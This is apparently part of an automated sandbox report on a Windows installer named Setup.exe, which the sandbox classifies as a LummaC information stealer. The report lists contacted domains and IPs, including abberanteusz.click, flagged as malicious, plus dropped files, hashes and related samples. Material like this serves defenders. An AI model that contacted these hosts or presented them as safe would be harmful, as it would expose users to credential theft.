                                                                                                                                                      https://sectigo.com/CPS0DWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dfgh.onlinepowershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://jrsoftware.org0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://jrsoftware.org/WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://abberanteusz.click/apigSetup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1856495243.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allSetup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crl.trustwave.com/TWGCA.crl0nSetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://sectigo.com/CPS0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://repository.certum.pl/ctnca.cer09WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoSetup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://crl.securetrust.com/TWGCSCA_L1.crl0ySetup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.certum.pl/CPS0WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://crl.certum.pl/cscasha2.crl0qWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://cscasha2.ocsp-certum.com04WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://abberanteusz.click:443/apiSetup.exe, 00000000.00000003.1856495243.00000000006AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tWPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://abberanteusz.click/api:Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.37.128 | klipvumisui.shop | United States | 13335 | CLOUDFLARENETUS | false
172.67.198.102 | abberanteusz.click | United States | 13335 | CLOUDFLARENETUS | true
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1583071
Start date and time: 2025-01-01 19:03:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 38
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@59/15@4/3
EGA Information:
  • Successful, ratio: 33.3%
HCA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target BrightLib.exe, PID 7628 because there are no executed function
  • Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
13:04:08  API Interceptor  8x Sleep call for process: Setup.exe modified
13:04:19  API Interceptor  20x Sleep call for process: powershell.exe modified
13:05:11  API Interceptor  1x Sleep call for process: BrightLib.exe modified
                                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                          yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.92.91
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 172.67.198.102
                                                                                                                                                                                                                          NTLGBloligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 81.104.109.62
                                                                                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 80.4.160.37
                                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
                                                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 185.161.251.21
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe | Active_Setup.exe | malicious | LummaC Stealer
 | setup.exe | malicious | LummaC
 | Set-up.exe | malicious | LummaC
 | #Setup.exe | malicious | LummaC
 | installer_1.05_36.5.exe | malicious | LummaC
 | @Setup.exe | malicious | LummaC Stealer
 | MdhO83N5Fm.exe | malicious | LummaC
C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll | qnUFsmyxMm.exe | malicious | LummaC
 | Active_Setup.exe | malicious | LummaC Stealer
 | setup.exe | malicious | LummaC
 | Set-up.exe | malicious | LummaC
 | #Setup.exe | malicious | LummaC
 | installer_1.05_36.5.exe | malicious | LummaC
 | @Setup.exe | malicious | LummaC Stealer
 | MdhO83N5Fm.exe | malicious | LummaC
 | installer_1.05_36.4.exe | malicious | LummaC Stealer
 | !Setup.exe | malicious | LummaC Stealer
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                                                                                            MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                                                                                            SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                                                                                            SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                                                                                            SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:@...e.................................,..............@..........
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6447207
                                                                                                                                                                                                                                                            Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                            MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                            SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                            SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                            SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):8767044
                                                                                                                                                                                                                                                            Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                            MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                            SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                            SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                                                                                            Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                            MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                            SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                            SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                            SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):846325235
                                                                                                                                                                                                                                                            Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                                                            MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                            SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                            SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                            SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):6.867571479419124
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                                                            • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                            File name:Setup.exe
                                                                                                                                                                                                                                                            File size:1'543'377 bytes
                                                                                                                                                                                                                                                            MD5:f24fcf422c2611892a30adf91d85f556
                                                                                                                                                                                                                                                            SHA1:87d13ac981079a41cbaa7df94d82d4818bf49444
                                                                                                                                                                                                                                                            SHA256:3ec2c8a5d04cb1407b981cecd39f2d95f99cfa7e76d4a31f81f23b430feb4da5
                                                                                                                                                                                                                                                            SHA512:4e2a725099d331ca9a48510093ca2f85b8d370a65ceb84cfd87cd5f85dc14e12765acc113cc2cba457c739350c4b35beae4ff7adb56597358f17b164ba42ad2b
                                                                                                                                                                                                                                                            SSDEEP:24576:XnbbPImgK4brDi4IxWRqzwqNb+Yz73P2EMZbG0JEtdqxytMDa/4wtoDfTgmG:3HeKh4BqzF3PYdStoXDagVU
                                                                                                                                                                                                                                                            TLSH:97657D22A7E58037D5B32F754E37D2959C757D212EB4D44A3EB88E0C0E79B80AE35392
                                                                                                                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                            Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                                            Entrypoint:0x5025d8
                                                                                                                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
